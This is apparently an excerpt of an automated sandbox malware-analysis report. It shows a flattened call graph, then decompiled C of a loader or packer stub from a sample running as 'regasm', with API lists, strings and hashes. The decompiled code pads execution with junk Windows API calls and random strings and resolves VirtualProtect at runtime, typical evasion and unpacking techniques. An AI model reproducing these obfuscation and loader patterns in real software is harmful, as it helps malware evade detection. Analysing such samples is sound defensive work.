12162->12163 12164 40ac63 LeaveCriticalSection 12162->12164 12167 40d61f LeaveCriticalSection 12163->12167 12164->12161 12166 40ac60 12166->12161 12167->12166 12169 404fa3 std::_String_base::_Xlen 12168->12169 12178 404ddf 12169->12178 12171 404faa 12172 405513 12171->12172 12173 40481d 12172->12173 12174 405530 12172->12174 12173->11841 12175 40553e 12174->12175 12227 4053df 12174->12227 12235 404c54 12175->12235 12181 404c75 12178->12181 12180 404dec 12180->12171 12184 404b14 12181->12184 12185 404b21 12184->12185 12186 404b33 12184->12186 12194 406383 12185->12194 12186->12185 12187 404b3f 12186->12187 12206 403f10 12187->12206 12193 404b57 12197 40638d 12194->12197 12195 406eda _malloc 68 API calls 12195->12197 12196 404b2e 12196->12180 12197->12195 12197->12196 12198 409465 __calloc_impl 6 API calls 12197->12198 12200 4063a9 std::bad_alloc::bad_alloc 12197->12200 12198->12197 12202 40943f __cinit 75 API calls 12200->12202 12204 4063cf 12200->12204 12202->12204 12203 4063e8 __CxxThrowException@8 RaiseException 12205 4063e7 12203->12205 12212 404b97 12204->12212 12221 405dab 12206->12221 12209 4063e8 12210 406411 12209->12210 12211 40641d RaiseException 12209->12211 12210->12211 12211->12193 12215 405e1b 12212->12215 12216 405e3b _strlen 12215->12216 12220 404ba5 12215->12220 12217 406eda _malloc 68 API calls 12216->12217 12216->12220 12218 405e4e 12217->12218 12219 406e23 _strcpy_s 68 API calls 12218->12219 12218->12220 12219->12220 12220->12203 12222 403f1f 12221->12222 12223 405dc4 _strlen 12221->12223 12222->12209 12224 406eda _malloc 68 API calls 12223->12224 12225 405dd3 12224->12225 12225->12222 12226 406e23 _strcpy_s 68 API calls 12225->12226 12226->12222 12228 4053e9 __EH_prolog 12227->12228 12229 4053ae std::_String_base::_Xlen 76 API calls 12228->12229 12230 4053f9 12229->12230 12238 405369 12230->12238 12233 4063e8 __CxxThrowException@8 RaiseException 12234 405417 12233->12234 12328 404ad2 12235->12328 12241 40532d 12238->12241 12242 405337 __EH_prolog std::bad_exception::bad_exception 12241->12242 12245 4051dc 12242->12245 12250 404d30 12245->12250 12247 4051eb 12254 4050a7 12247->12254 12249 4051f9 12249->12233 12251 404d3c 12250->12251 12253 404d5a std::_String_base::_Xlen 12250->12253 12251->12253 12267 404cd0 12251->12267 12253->12247 12255 4050b7 std::bad_exception::bad_exception 12254->12255 12256 4050c3 std::bad_exception::bad_exception 12255->12256 12274 405d45 12255->12274 12258 4050f4 12256->12258 12259 4050de 12256->12259 12290 404fb1 12258->12290 12284 404d7e 12259->12284 12262 4050e8 12263 404d7e std::bad_exception::bad_exception 76 API calls 12262->12263 12264 4050f2 std::_String_base::_Xlen 12263->12264 12264->12249 12265 4050fc std::_String_base::_Xlen 12265->12264 12266 404cd0 std::_String_base::_Xlen 68 API calls 12265->12266 12266->12264 12268 404cd9 std::_String_base::_Xlen 12267->12268 12271 404bb2 12268->12271 12272 403f82 char_traits 68 API calls 12271->12272 12273 404bc6 12272->12273 12273->12253 12275 405d51 __EH_prolog3 12274->12275 12276 4053ae std::_String_base::_Xlen 76 API calls 12275->12276 12277 405d5e 12276->12277 12299 405cbe 12277->12299 12280 4063e8 __CxxThrowException@8 RaiseException 12281 405d7c 12280->12281 12302 405418 12281->12302 12285 404d8e 12284->12285 12287 404d93 std::_String_base::_Xlen 12284->12287 12286 405d45 std::bad_exception::bad_exception 76 API calls 12285->12286 12286->12287 12289 404dc9 std::_String_base::_Xlen 12287->12289 12308 404cf4 12287->12308 12289->12262 12291 404fbd std::_String_base::_Xlen 12290->12291 12292 404fc9 12291->12292 12312 405d0d 12291->12312 12293 404fce 12292->12293 12296 404fdb 12292->12296 12320 404e3c 12293->12320 12297 404fd9 std::_String_base::_Xlen 12296->12297 12298 404d30 std::_String_base::_Xlen 68 API calls 12296->12298 12297->12265 12298->12297 12300 40532d std::bad_exception::bad_exception 76 API calls 12299->12300 12301 405cce 12300->12301 12301->12280 12303 405422 __EH_prolog 12302->12303 12304 405e1b std::exception::exception 68 API calls 12303->12304 12305 405433 12304->12305 12306 4051dc std::bad_exception::bad_exception 76 API calls 12305->12306 12307 405449 12306->12307 12307->12256 12309 404cfd std::_String_base::_Xlen 12308->12309 12310 404bd6 std::bad_exception::bad_exception 68 API calls 12309->12310 12311 404d14 12310->12311 12311->12289 12313 405d19 __EH_prolog3 12312->12313 12314 4053ae std::_String_base::_Xlen 76 API calls 12313->12314 12315 405d26 12314->12315 12316 405369 std::bad_exception::bad_exception 76 API calls 12315->12316 12317 405d36 12316->12317 12318 4063e8 __CxxThrowException@8 RaiseException 12317->12318 12319 405d44 12318->12319 12322 404e46 std::_String_base::_Xlen __EH_prolog 12320->12322 12321 404cbf std::_String_base::_Xlen 76 API calls 12323 404e9f std::_String_base::_Xlen 12321->12323 12322->12321 12324 404ee7 12323->12324 12327 404cd0 std::_String_base::_Xlen 68 API calls 12323->12327 12325 404d30 std::_String_base::_Xlen 68 API calls 12324->12325 12326 404ef2 std::_String_base::_Xlen 12325->12326 12326->12297 12327->12324 12329 404aef 12328->12329 12330 404adf 12328->12330 12329->12330 12331 404afb 12329->12331 12332 406383 std::_String_base::_Xlen 76 API calls 12330->12332 12333 403f10 std::_String_base::_Xlen 68 API calls 12331->12333 12334 404aea 12332->12334 12335 404b05 12333->12335 12334->12173 12336 4063e8 __CxxThrowException@8 RaiseException 12335->12336 12337 404b13 12336->12337 12339 40520e std::_String_base::_Xlen 12338->12339 12342 405143 12339->12342 12341 40482a 12341->11847 12343 405153 std::_String_base::_Xlen 12342->12343 12344 405159 std::_String_base::_Xlen 12343->12344 12345 40516e 12343->12345 12348 4050a7 std::bad_exception::bad_exception 76 API calls 12344->12348 12346 404fb1 std::_String_base::_Xlen 76 API calls 12345->12346 12349 405178 std::_String_base::_Xlen 12346->12349 12347 40516c std::_String_base::_Xlen 12347->12341 12348->12347 12349->12347 12350 404cd0 std::_String_base::_Xlen 68 API calls 12349->12350 12350->12347 12366 405015 12351->12366 12354 405b69 12356 405b77 12354->12356 12355 405b7b 12383 40593d 12355->12383 12356->12355 12376 4051a2 12356->12376 12361 405ba7 12362 4051a2 6 API calls 12361->12362 12363 405bb6 12362->12363 12413 404e0e 12363->12413 12369 404f28 12366->12369 12368 405026 12368->12354 12370 404f35 12369->12370 12372 404f4e 12370->12372 12373 406358 12370->12373 12372->12368 12374 406332 _strcpy_s 6 API calls 12373->12374 12375 406364 12374->12375 12375->12372 12377 405015 6 API calls 12376->12377 12378 4051b1 12377->12378 12379 4049d6 12378->12379 12380 4049e2 12379->12380 12381 406358 6 API calls 12380->12381 12382 4049fa 12380->12382 12381->12382 12382->12355 12385 405947 __EH_prolog 12383->12385 12384 405a0a std::_String_base::_Xlen 12384->12361 12385->12384 12386 405988 12385->12386 12387 4053df 76 API calls 12385->12387 12388 405a66 12386->12388 12393 405992 12386->12393 12387->12386 12389 405b07 12388->12389 12390 405a7d 12388->12390 12392 4051dc std::bad_exception::bad_exception 76 API calls 12389->12392 12391 4051dc std::bad_exception::bad_exception 76 API calls 12390->12391 12394 405a85 12391->12394 12395 405b0f 12392->12395 12396 404c54 76 API calls 12393->12396 12397 4058c9 76 API calls 12394->12397 12398 4058c9 76 API calls 12395->12398 12399 4059b7 12396->12399 12400 405aa3 12397->12400 12401 405b2e 12398->12401 12416 4058c9 12399->12416 12422 4055e9 12400->12422 12426 4058e2 12401->12426 12405 4059cf 12409 4058c9 76 API calls 12405->12409 12406 4055e9 76 API calls 12408 405ae0 12406->12408 12410 404f83 Mailbox 68 API calls 12408->12410 12411 4059ef 12409->12411 12410->12384 12411->12384 12419 40576d 12411->12419 12490 404c86 12413->12490 12430 4057ba 12416->12430 12463 4055be 12419->12463 12423 4055f8 12422->12423 12478 4054dc 12423->12478 12427 4058f8 12426->12427 12482 4057fe 12427->12482 12431 4057cf 12430->12431 12434 405678 12431->12434 12435 405682 __EH_prolog 12434->12435 12442 404f62 12435->12442 12437 4056e9 12439 404f83 Mailbox 68 API calls 12437->12439 12438 405699 12438->12437 12446 405503 12438->12446 12440 4056f1 12439->12440 12440->12405 12443 404f6d std::_String_base::_Xlen 12442->12443 12444 404d30 std::_String_base::_Xlen 68 API calls 12443->12444 12445 404f7f 12444->12445 12445->12438 12449 405293 12446->12449 12451 40529d __EH_prolog 12449->12451 12450 4052b6 12450->12438 12451->12450 12452 4051dc std::bad_exception::bad_exception 76 API calls 12451->12452 12453 4052fe 12452->12453 12459 40521f 12453->12459 12456 40521f 76 API calls 12457 405315 12456->12457 12458 404f83 Mailbox 68 API calls 12457->12458 12458->12450 12460 4051b8 12459->12460 12461 4050a7 std::bad_exception::bad_exception 76 API calls 12460->12461 12462 4051c7 12461->12462 12462->12456 12464 4055cf std::_String_base::_Xlen 12463->12464 12467 4054bd 12464->12467 12470 4054c6 12467->12470 12468 4054d7 12468->12384 12470->12468 12471 405228 12470->12471 12472 4051cb 12471->12472 12475 405043 12472->12475 12474 4051d8 12474->12470 12476 404f83 Mailbox 68 API calls 12475->12476 12477 40504e Mailbox 12476->12477 12477->12474 12479 4054e5 12478->12479 12480 4054f7 12479->12480 12481 40521f 76 API calls 12479->12481 12480->12408 12481->12479 12483 40581b 12482->12483 12486 405704 12483->12486 12487 405710 12486->12487 12488 405727 12486->12488 12487->12488 12489 405503 76 API calls 12487->12489 12488->12406 12489->12487 12493 404a52 12490->12493 12494 404a5f 12493->12494 12495 406358 6 API calls 12494->12495 12496 404a68 12494->12496 12495->12496 12497 406358 6 API calls 12496->12497 12498 404a91 12496->12498 12497->12498 12498->11851 12513 40502d 12499->12513 12502 40502d 6 API calls 12503 40588f 12502->12503 12516 404c9b 12503->12516 12506 4058bd 12506->11866 12509 40576d 68 API calls 12509->12506 12511 40593d 76 API calls 12510->12511 12512 405bda 12511->12512 12512->11870 12514 405015 6 API calls 12513->12514 12515 40503c 12514->12515 12515->12502 12523 404a9d 12516->12523 12519 40555d 12520 405577 std::_String_base::_Xlen 12519->12520 12527 405476 12520->12527 12524 404aa9 12523->12524 12525 406358 6 API calls 12524->12525 12526 404ac1 12524->12526 12525->12526 12526->12506 12526->12519 12528 405498 12527->12528 12531 405231 12528->12531 12532 40523a 12531->12532 12533 40524f 12532->12533 12534 40521f 76 API calls 12532->12534 12533->12509 12534->12532 12536 408df6 __decode_pointer 6 API calls 12535->12536 12537 4068fc 12536->12537 12537->11878 12538 40a726 12537->12538 12540 40a732 __lseeki64 12538->12540 12539 40a78e 12542 40a76f 12539->12542 12544 40a79d 12539->12544 12540->12539 12541 40a759 12540->12541 12540->12542 12547 40a755 12540->12547 12543 408fc9 __getptd_noexit 68 API calls 12541->12543 12545 408df6 __decode_pointer 6 API calls 12542->12545 12548 40a75e _siglookup 12543->12548 12546 407567 _strcpy_s 68 API calls 12544->12546 12545->12548 12549 40a7a2 12546->12549 12547->12541 12547->12544 12551 40a804 12548->12551 12552 40a642 _abort 68 API calls 12548->12552 12553 40a767 __lseeki64 12548->12553 12550 406332 _strcpy_s 6 API calls 12549->12550 12550->12553 12554 40d6f9 __lock 68 API calls 12551->12554 12555 40a80f 12551->12555 12552->12551 12553->11878 12554->12555 12556 408ded __init_pointers 7 API calls 12555->12556 12557 40a844 12555->12557 12556->12557 12562 40a89a 12557->12562 12567 40a500 12559->12567 12561 4069e6 12563 40a8a0 12562->12563 12564 40a8a7 12562->12564 12566 40d61f LeaveCriticalSection 12563->12566 12564->12553 12566->12564 12568 40a50c __lseeki64 12567->12568 12569 40d6f9 __lock 68 API calls 12568->12569 12570 40a513 12569->12570 12572 408df6 __decode_pointer 6 API calls 12570->12572 12575 40a5cc __initterm 12570->12575 12574 40a54a 12572->12574 12574->12575 12577 408df6 __decode_pointer 6 API calls 12574->12577 12584 40a617 12575->12584 12583 40a55f 12577->12583 12578 40a60b 12580 40a410 _malloc 3 API calls 12578->12580 12579 40a614 __lseeki64 12579->12561 12580->12579 12581 408ded 7 API calls __init_pointers 12581->12583 12582 408df6 6 API calls __decode_pointer 12582->12583 12583->12575 12583->12581 12583->12582 12585 40a5f8 12584->12585 12586 40a61d 12584->12586 12585->12579 12588 40d61f LeaveCriticalSection 12585->12588 12589 40d61f LeaveCriticalSection 12586->12589 12588->12578 12589->12585

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 40455f-40456c 1 40456e-404574 0->1 2 404581-40458b 1->2 3 404576-40457b 1->3 4 404594-40459b 2->4 5 40458d-40458e GetModuleHandleW 2->5 3->2 4->1 6 40459d-4045aa call 40454b 4->6 5->4 9 4045d7-4045de 6->9 10 4045ac-4045bc call 4042a3 6->10 12 4045e3-4045ed 9->12 17 4045ce-4045d5 10->17 18 4045be-4045c8 GetEnvironmentStringsW InterlockedDecrement 10->18 13 404638-404639 12->13 14 4045ef-404632 GetConsoleAliasExesLengthW EnumCalendarInfoA InterlockedExchangeAdd GetConsoleTitleA InterlockedExchangeAdd EnumDateFormatsW HeapSetInformation GetACP 12->14 13->12 16 40463b 13->16 14->13 19 404640-40464a 16->19 17->9 17->10 18->17 20 404657-40465d 19->20 21 40464c-404651 GetModuleHandleW 19->21 22 40466b-404672 20->22 23 40465f-404666 GetModuleHandleA 20->23 21->20 22->19 24 404674-40468e GetProcAddress 22->24 23->22 25 40468f-404692 24->25 26 404694 call 40444d 25->26 27 404699-4046a0 25->27 26->27 27->25 29 4046a2-4046ad 27->29 30 4046b3 call 4041cf 29->30 31 4046b8 30->31 32 4046ba-4046c1 31->32 33 4046c3-4046c7 InterlockedIncrement 32->33 34 4046cd-4046d3 32->34 33->34 35 4046d5 call 40443f 34->35 36 4046da-4046e1 34->36 35->36 36->32 38 4046e3 call 404008 36->38 40 4046e8-4046f2 38->40 41 4047d3-4047dd call 404439 40->41 42 4046f8-4047cd FindFirstVolumeA GetConsoleFontSize CreateJobObjectA GetModuleHandleW FormatMessageA FindResourceA CreateTimerQueueTimer CopyFileW SearchPathA GetConsoleTitleW CancelTimerQueueTimer VerifyVersionInfoW FindFirstChangeNotificationW InterlockedDecrement InterlockedExchange InterlockedDecrement GetCommandLineW GetThreadSelectorEntry GetBinaryTypeA MoveFileWithProgressA 40->42 42->41
                                                                                  C-Code - Quality: 74%
                                                                                  			E0040455F(void* __ecx, void* __edi) {
                                                                                  				long _v8;
                                                                                  				long _v12;
                                                                                  				struct _LDT_ENTRY _v20;
                                                                                  				struct _OSVERSIONINFOEXW _v304;
                                                                                  				char _v1328;
                                                                                  				short _v3376;
                                                                                  				long _t28;
                                                                                  				void* _t57;
                                                                                  				void* _t58;
                                                                                  				void* _t59;
                                                                                  				CHAR* _t61;
                                                                                  				void* _t62;
                                                                                  				CHAR* _t64;
                                                                                  				void* _t65;
                                                                                  				void* _t66;
                                                                                  				intOrPtr _t73;
                                                                                  				void* _t75;
                                                                                  
                                                                                  				_t58 = __edi;
                                                                                  				_t57 = __ecx;
                                                                                  				_t61 = 0;
                                                                                  				do {
                                                                                  					if(_t61 == 0x420) {
                                                                                  						 *0x58da80 =  *0x58da80 + 0x38d6;
                                                                                  					}
                                                                                  					if( *0x58da80 == 0x3f4) {
                                                                                  						GetModuleHandleW(0);
                                                                                  					}
                                                                                  					_t61 = _t61 + 1;
                                                                                  				} while (_t61 < 0x40dece);
                                                                                  				E0040454B();
                                                                                  				_t62 = 0;
                                                                                  				_t73 =  *0x58da80; // 0xf478
                                                                                  				if(_t73 > 0) {
                                                                                  					do {
                                                                                  						E004042A3(_t62);
                                                                                  						if( *0x58da80 == 0x1af) {
                                                                                  							GetEnvironmentStringsW();
                                                                                  							InterlockedDecrement( &_v8);
                                                                                  						}
                                                                                  						_t62 = _t62 + 1;
                                                                                  						_t75 = _t62 -  *0x58da80; // 0xf478
                                                                                  					} while (_t75 < 0);
                                                                                  				}
                                                                                  				_push(_t58);
                                                                                  				_t59 = 0x5aedb1f;
                                                                                  				do {
                                                                                  					if( *0x58da80 == 0x2d5) {
                                                                                  						__imp__GetConsoleAliasExesLengthW();
                                                                                  						EnumCalendarInfoA(0, 0, 0, 0);
                                                                                  						InterlockedExchangeAdd( &_v8, 0);
                                                                                  						GetConsoleTitleA("xetazopajewosexavoyewus", 0);
                                                                                  						InterlockedExchangeAdd( &_v12, 0);
                                                                                  						EnumDateFormatsW(0, 0, 0);
                                                                                  						__imp__HeapSetInformation(0, 0,  &_v1328, 0);
                                                                                  						GetACP();
                                                                                  					}
                                                                                  					_t59 = _t59 - 1;
                                                                                  				} while (_t59 != 0);
                                                                                  				_t64 = "VirtualProtect";
                                                                                  				do {
                                                                                  					if( *0x58da80 == 0x92) {
                                                                                  						GetModuleHandleW(L"miwisifiwebipurejez");
                                                                                  					}
                                                                                  					if(_t59 == 0xa9a9) {
                                                                                  						 *0x58befc = GetModuleHandleA(_t64);
                                                                                  					}
                                                                                  					_t59 = _t59 + 1;
                                                                                  				} while (_t59 < 0x25563);
                                                                                  				"VirtualProtect" = 0;
                                                                                  				 *0x42c984 = GetProcAddress( *0x58befc, _t64);
                                                                                  				_t65 = 0;
                                                                                  				do {
                                                                                  					if(_t65 == 0x1c) {
                                                                                  						E0040444D(_t57); // executed
                                                                                  					}
                                                                                  					_t65 = _t65 + 1;
                                                                                  				} while (_t65 < 0x3debc7);
                                                                                  				_t28 = E004041CF( *0x57e7bc,  *0x58da80, 0x41b010);
                                                                                  				_t66 = 0;
                                                                                  				do {
                                                                                  					if( *0x58da80 == 0x10) {
                                                                                  						_t28 = InterlockedIncrement( &_v12);
                                                                                  					}
                                                                                  					if(_t66 == 0x1e674) {
                                                                                  						_t28 = E0040443F(_t28);
                                                                                  					}
                                                                                  					_t66 = _t66 + 1;
                                                                                  				} while (_t66 < 0x3e4e2);
                                                                                  				E00404008();
                                                                                  				if( *0x58da80 == 0x1144) {
                                                                                  					__imp__FindFirstVolumeA(0, 0);
                                                                                  					__imp__GetConsoleFontSize(0, 0);
                                                                                  					__imp__CreateJobObjectA(0, "gitujolocelemeginanegedamodehey");
                                                                                  					GetModuleHandleW(L"Def vavadukucupukubuloxasewijir zuhajelijazupohijife xajeporukojesubox");
                                                                                  					FormatMessageA(0, 0, 0, 0,  &_v1328, 0, 0);
                                                                                  					FindResourceA(0, 0, 0);
                                                                                  					__imp__CreateTimerQueueTimer(0, 0, 0, 0, 0, 0, 0);
                                                                                  					CopyFileW(0, 0, 0);
                                                                                  					SearchPathA(0, 0, 0, 0, 0, 0);
                                                                                  					GetConsoleTitleW( &_v3376, 0);
                                                                                  					__imp__CancelTimerQueueTimer(0, 0);
                                                                                  					VerifyVersionInfoW( &_v304, 0, 0);
                                                                                  					FindFirstChangeNotificationW(0, 0, 0);
                                                                                  					InterlockedDecrement( &_v12);
                                                                                  					InterlockedExchange(0, 0);
                                                                                  					InterlockedDecrement(0);
                                                                                  					GetCommandLineW();
                                                                                  					GetThreadSelectorEntry(0, 0,  &_v20);
                                                                                  					GetBinaryTypeA(0,  &_v8);
                                                                                  					__imp__MoveFileWithProgressA("yukubetojomumazedakedirezedifabecixafuzimamibokovor", "napepelicodovefajalofelakulahelunemujuxeziziku", 0, 0, 0, 0);
                                                                                  				}
                                                                                  				L00404439();
                                                                                  				return 0;
                                                                                  			}




















                                                                                  0x0040455f
                                                                                  0x0040455f
                                                                                  0x0040456c
                                                                                  0x0040456e
                                                                                  0x00404574
                                                                                  0x0040457b
                                                                                  0x0040457b
                                                                                  0x0040458b
                                                                                  0x0040458e
                                                                                  0x0040458e
                                                                                  0x00404594
                                                                                  0x00404595
                                                                                  0x0040459d
                                                                                  0x004045a2
                                                                                  0x004045a4
                                                                                  0x004045aa
                                                                                  0x004045ac
                                                                                  0x004045ad
                                                                                  0x004045bc
                                                                                  0x004045be
                                                                                  0x004045c8
                                                                                  0x004045c8
                                                                                  0x004045ce
                                                                                  0x004045cf
                                                                                  0x004045cf
                                                                                  0x004045ac
                                                                                  0x004045dd
                                                                                  0x004045de
                                                                                  0x004045e3
                                                                                  0x004045ed
                                                                                  0x004045ef
                                                                                  0x004045f9
                                                                                  0x00404604
                                                                                  0x0040460c
                                                                                  0x00404617
                                                                                  0x0040461c
                                                                                  0x0040462c
                                                                                  0x00404632
                                                                                  0x00404632
                                                                                  0x00404638
                                                                                  0x00404638
                                                                                  0x0040463b
                                                                                  0x00404640
                                                                                  0x0040464a
                                                                                  0x00404651
                                                                                  0x00404651
                                                                                  0x0040465d
                                                                                  0x00404666
                                                                                  0x00404666
                                                                                  0x0040466b
                                                                                  0x0040466c
                                                                                  0x0040467b
                                                                                  0x00404687
                                                                                  0x0040468c
                                                                                  0x0040468f
                                                                                  0x00404692
                                                                                  0x00404694
                                                                                  0x00404694
                                                                                  0x00404699
                                                                                  0x0040469a
                                                                                  0x004046b3
                                                                                  0x004046b8
                                                                                  0x004046ba
                                                                                  0x004046c1
                                                                                  0x004046c7
                                                                                  0x004046c7
                                                                                  0x004046d3
                                                                                  0x004046d5
                                                                                  0x004046d5
                                                                                  0x004046da
                                                                                  0x004046db
                                                                                  0x004046e3
                                                                                  0x004046f2
                                                                                  0x004046fa
                                                                                  0x00404702
                                                                                  0x0040470e
                                                                                  0x00404719
                                                                                  0x0040472c
                                                                                  0x00404735
                                                                                  0x00404742
                                                                                  0x0040474b
                                                                                  0x00404757
                                                                                  0x00404765
                                                                                  0x0040476d
                                                                                  0x0040477d
                                                                                  0x00404786
                                                                                  0x00404796
                                                                                  0x0040479a
                                                                                  0x004047a1
                                                                                  0x004047a3
                                                                                  0x004047af
                                                                                  0x004047ba
                                                                                  0x004047cd
                                                                                  0x004047cd
                                                                                  0x004047d3
                                                                                  0x004047dd

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040458E
                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 004045BE
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 004045C8
                                                                                  • GetConsoleAliasExesLengthW.KERNEL32 ref: 004045EF
                                                                                  • EnumCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004045F9
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00404604
                                                                                  • GetConsoleTitleA.KERNEL32(xetazopajewosexavoyewus,00000000), ref: 0040460C
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00404617
                                                                                  • EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 0040461C
                                                                                  • HeapSetInformation.KERNEL32(00000000,00000000,?,00000000), ref: 0040462C
                                                                                  • GetACP.KERNEL32 ref: 00404632
                                                                                  • GetModuleHandleW.KERNEL32(miwisifiwebipurejez), ref: 00404651
                                                                                  • GetModuleHandleA.KERNEL32(VirtualProtect), ref: 00404660
                                                                                  • GetProcAddress.KERNEL32(VirtualProtect), ref: 00404681
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 004046C7
                                                                                  • FindFirstVolumeA.KERNEL32(00000000,00000000), ref: 004046FA
                                                                                  • GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 00404702
                                                                                  • CreateJobObjectA.KERNEL32(00000000,gitujolocelemeginanegedamodehey), ref: 0040470E
                                                                                  • GetModuleHandleW.KERNEL32(Def vavadukucupukubuloxasewijir zuhajelijazupohijife xajeporukojesubox), ref: 00404719
                                                                                  • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040472C
                                                                                  • FindResourceA.KERNEL32 ref: 00404735
                                                                                  • CreateTimerQueueTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404742
                                                                                  • CopyFileW.KERNEL32 ref: 0040474B
                                                                                  • SearchPathA.KERNEL32 ref: 00404757
                                                                                  • GetConsoleTitleW.KERNEL32 ref: 00404765
                                                                                  • CancelTimerQueueTimer.KERNEL32 ref: 0040476D
                                                                                  • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 0040477D
                                                                                  • FindFirstChangeNotificationW.KERNEL32(00000000,00000000,00000000), ref: 00404786
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00404796
                                                                                  • InterlockedExchange.KERNEL32(00000000,00000000), ref: 0040479A
                                                                                  • InterlockedDecrement.KERNEL32(00000000), ref: 004047A1
                                                                                  • GetCommandLineW.KERNEL32 ref: 004047A3
                                                                                  • GetThreadSelectorEntry.KERNEL32 ref: 004047AF
                                                                                  • GetBinaryTypeA.KERNEL32(00000000,?), ref: 004047BA
                                                                                  • MoveFileWithProgressA.KERNEL32 ref: 004047CD
                                                                                  Strings
                                                                                  • gitujolocelemeginanegedamodehey, xrefs: 00404708
                                                                                  • miwisifiwebipurejez, xrefs: 0040464C
                                                                                  • xetazopajewosexavoyewus, xrefs: 00404607
                                                                                  • VirtualProtect, xrefs: 0040463B, 0040465F, 00404674, 0040467B
                                                                                  • yukubetojomumazedakedirezedifabecixafuzimamibokovor, xrefs: 004047C8
                                                                                  • napepelicodovefajalofelakulahelunemujuxeziziku, xrefs: 004047C3
                                                                                  • Def vavadukucupukubuloxasewijir zuhajelijazupohijife xajeporukojesubox, xrefs: 00404714
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked$ConsoleHandleModuleTimer$DecrementExchangeFind$CreateEnumFileFirstInfoQueueTitle$AddressAliasBinaryCalendarCancelChangeCommandCopyDateEntryEnvironmentExesFontFormatFormatsHeapIncrementInformationLengthLineMessageMoveNotificationObjectPathProcProgressResourceSearchSelectorSizeStringsThreadTypeVerifyVersionVolumeWith
                                                                                  • String ID: Def vavadukucupukubuloxasewijir zuhajelijazupohijife xajeporukojesubox$VirtualProtect$gitujolocelemeginanegedamodehey$miwisifiwebipurejez$napepelicodovefajalofelakulahelunemujuxeziziku$xetazopajewosexavoyewus$yukubetojomumazedakedirezedifabecixafuzimamibokovor
                                                                                  • API String ID: 3745993760-3520429456
                                                                                  • Opcode ID: 6c1ddcb303de1b855e50c5afea1a09d0b3c55e145841b59f70c42422441b3200
                                                                                  • Instruction ID: 7102328264da1e801ffcb24fc9a125aa269a52ff6a15517ec17a340696ab829f
                                                                                  • Opcode Fuzzy Hash: 6c1ddcb303de1b855e50c5afea1a09d0b3c55e145841b59f70c42422441b3200
                                                                                  • Instruction Fuzzy Hash: 135140F2800158BFD7106BB0EEC9DAB77ACEB58349B005436F642B29B1D6384D859B7D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 78%
                                                                                  			E004047DE() {
                                                                                  				intOrPtr _v8;
                                                                                  				char _v36;
                                                                                  				char _v72;
                                                                                  				short _v2120;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				void* __ebp;
                                                                                  				intOrPtr _t13;
                                                                                  				void* _t50;
                                                                                  				void* _t51;
                                                                                  				intOrPtr _t52;
                                                                                  				void* _t60;
                                                                                  				void* _t61;
                                                                                  				void* _t62;
                                                                                  
                                                                                  				_t66 =  *0x58da80 - 3;
                                                                                  				if( *0x58da80 == 3) {
                                                                                  					E00406B38(0, 0, 0);
                                                                                  					_push(0);
                                                                                  					_push(0);
                                                                                  					E00406A9D(0, 0);
                                                                                  					E004069E7(0);
                                                                                  					E004069E7(0);
                                                                                  					E0040572D( &_v72, _t66);
                                                                                  					E004053AE( &_v36, _t61, "0");
                                                                                  					E00405BDE( &_v72, _t60, _t66,  &_v36);
                                                                                  					E00404F83();
                                                                                  					E004053AE( &_v36, _t61, "ruwey");
                                                                                  					E00405CB5( &_v72, _t60, 0xa,  &_v36);
                                                                                  					E00404F83();
                                                                                  					E004068D0(_t50, _t60, _t61, 0);
                                                                                  					E0040683B();
                                                                                  				}
                                                                                  				_t13 =  *0x41bdd4; // 0xbba2
                                                                                  				_t52 =  *0x41b008; // 0x41850a
                                                                                  				_t62 = GetTickCount;
                                                                                  				 *0x58da80 = _t13;
                                                                                  				 *0x58da84 = _t52;
                                                                                  				if(_t13 == 0x1d) {
                                                                                  					GlobalFindAtomW(0);
                                                                                  					LoadLibraryW(L"noziyunejehugahukofinaxekarohorexoretazavadabiz");
                                                                                  					CreateDirectoryExA("decudosilodematebugalufo", "muceragumusitutidogabowu", 0);
                                                                                  					__imp__GetProcessIoCounters(0, 0);
                                                                                  					GetOEMCP();
                                                                                  					SetConsoleActiveScreenBuffer(0);
                                                                                  					GetAtomNameW(0,  &_v2120, 0);
                                                                                  					__imp__SetVolumeMountPointA(0, 0);
                                                                                  					SetConsoleTitleW(L"boselolodurivog");
                                                                                  					FreeEnvironmentStringsA(0);
                                                                                  					GetMailslotInfo(0, 0, 0, 0, 0);
                                                                                  					AddAtomW(0);
                                                                                  					MoveFileW(0, 0);
                                                                                  					GetTickCount();
                                                                                  					TerminateThread(0, 0);
                                                                                  					GetModuleHandleA(0);
